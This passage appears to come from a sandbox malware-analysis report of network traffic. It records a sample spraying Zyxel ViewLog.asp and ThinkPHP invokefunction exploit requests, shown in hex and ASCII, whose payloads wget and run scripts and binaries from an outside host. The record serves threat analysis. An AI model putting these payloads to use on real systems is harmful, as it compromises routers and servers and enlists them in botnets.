                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      960192.168.2.153311894.120.160.518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.718651056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      961192.168.2.154358094.136.239.1098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.741655111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      962192.168.2.154901085.50.188.668080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:00.957562923 CET290INHTTP/1.0 400 Bad Request
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:31:25 GMT
                                                      Content-Type: text/html
                                                      CONTENT-LANGUAGE: en
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      963192.168.2.1554648112.25.57.4380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:01.795046091 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:02.501950026 CET479INHTTP/1.1 400 Bad Request
                                                      Server: Tengine
                                                      Date: Wed, 14 Feb 2024 08:31:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 249
                                                      Connection: close
                                                      Via: live8.cn572[,0]
                                                      Timing-Allow-Origin: *
                                                      EagleId: 0000000017078994623198054e
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      964192.168.2.1554646112.25.57.4380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:02.778008938 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:03.386940956 CET479INHTTP/1.1 400 Bad Request
                                                      Server: Tengine
                                                      Date: Wed, 14 Feb 2024 08:31:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 249
                                                      Connection: close
                                                      Via: live6.cn572[,0]
                                                      Timing-Allow-Origin: *
                                                      EagleId: 0000000017078994632115438e
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      965192.168.2.155583094.196.100.1458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.265928984 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      966192.168.2.155643294.122.94.2138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.267777920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      967192.168.2.155642262.29.81.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.270450115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      968192.168.2.155951294.121.79.98080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.270611048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      969192.168.2.154433895.86.72.258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.275615931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      970192.168.2.155294831.136.201.2038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.467423916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.087425947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.335361004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.927329063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.047204971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:23.031089067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:42.742373943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      971192.168.2.154439431.136.120.2418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.467600107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.087410927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.303338051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.927352905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:12.791101933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.519062042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:42.742404938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      972192.168.2.155647831.136.70.528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.487042904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.151470900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.495342970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.183341980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.559331894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
